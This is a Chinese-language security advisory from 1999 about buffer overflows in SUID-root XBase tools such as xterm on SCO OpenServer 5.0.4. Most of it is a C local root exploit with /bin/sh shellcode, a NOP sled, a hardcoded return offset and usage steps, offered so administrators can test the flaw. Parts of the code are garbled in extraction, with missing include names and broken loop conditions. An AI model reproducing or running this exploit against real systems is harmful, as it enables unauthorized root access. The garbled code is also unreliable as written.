SCO Openserver XBase的缓冲区溢出发布时间:1999-10-14 更新时间:1999-10-14 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 SCO OpenServer 5.0.4详细描述 大部分由SCO OpenServer 5.0.x的XBASE包自带的工具都存在着缓冲益处漏洞攻击,一些基于XBASE的工具是SUID ROOT,想SCOTERM,XTREM,XLOAD;这些带有SUID的程序存在着危险的漏洞,且很容易被利用。新的SCO对这些漏洞提供了补丁,但仍旧存在某些版本存在危险。即使这个情况已经很多人知道了(及多数的BUG也已有供应商修补了),但确实以前没有可利用的代码来测试此漏洞。现在测试此漏洞的代码已经发现,系统管理员可以测试XBASE的漏洞了。 测试代码 /* * Local root exploit * * Offset: xterm (SCO OpenServer 5.0.4) * 0 -> From an open scoterm (without display parameter) * 2000 -> From remote telnet (with display parameter) * * Usage: * $ cc xtermx.c -o xtermx * $ scoterm * $ /usr/bin/X11/xterm -bg `xtermx` * or * $ /usr/bin/X11/xterm -display 1.1.1.1:0 -bg `xtermx 2000` * * Note: xterm need to be run from a valid x- display * * By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99) * * - * */ #include #include char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88 \x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56 \xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\ xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x80471ff // SCO OpenServer 5.0.4 #define ALINEA 0 #define LEN 2000 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: xtermx [offset]\n"); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+1000,hell,strlen(hell)); for(i=1100+ALINEA;i*(int *)&buf[i]=OFF+offset; for(i=0;iputchar(buf[i]); exit(0); } 解决方案 安装补丁 相关信息 |
